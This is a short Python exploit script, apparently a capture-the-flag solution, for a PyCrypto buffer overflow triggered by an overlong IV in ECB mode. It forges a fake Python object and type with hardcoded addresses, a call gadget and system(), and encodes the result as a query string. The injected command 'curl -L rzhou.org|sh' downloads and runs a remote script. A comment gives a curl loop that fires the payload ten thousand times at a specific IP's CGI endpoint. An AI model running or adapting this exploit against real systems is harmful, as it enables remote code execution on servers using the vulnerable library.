#!/usr/bin/python
# https://bugs.launchpad.net/pycrypto/+bug/1506613
# It's really a buffer overflow when specifying a long IV in ECB mode.
# This took so long to brute force...
#
# ./generate_qs.py > qs
# for i in {1..10000}; do echo $i; curl -s -o /dev/null "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?$(cat qs)"; done
import struct
import sys
import urllib

def p(v):
    return struct.pack('<I', v)

def u(v):
    return struct.unpack('<I', v)[0]

system = 0x0805a2f0

fake_object_addr = 0x9d76578
fake_type_addr = fake_object_addr + 0x1c

fake_object = ''
fake_object += p(1)
fake_object += p(fake_type_addr)
fake_object = fake_object.ljust(0x18, 'F')
fake_object += p(system)

'''
 81580d6:       52                      push   %edx
 81580d7:       ff 50 18                call   *0x18(%eax)
'''
cmd = 'curl -L rzhou.org|sh'
call_gadget = 0x81580d6
fake_type = ''
fake_type += cmd.ljust(0x18, '\x00')
fake_type += p(call_gadget)

payload = ''
payload += 'I' * 32
payload += p(fake_object_addr)
payload += fake_object
payload += fake_type

if len(payload) % 16 != 0:
  payload += 'A' * (16 - (len(payload) % 16))

sys.stderr.write(str(len(payload)) + '\n')

def quote(data):
  out = ''
  for c in data:
    out += '%%%02x' % ord(c)
  return out

quoted = quote(payload)

qs = 'key=AAAAAAAAAAAAAAAA&mode=1&iv=' + quoted
qs += '&x=' + quoted * 220
sys.stdout.write(qs)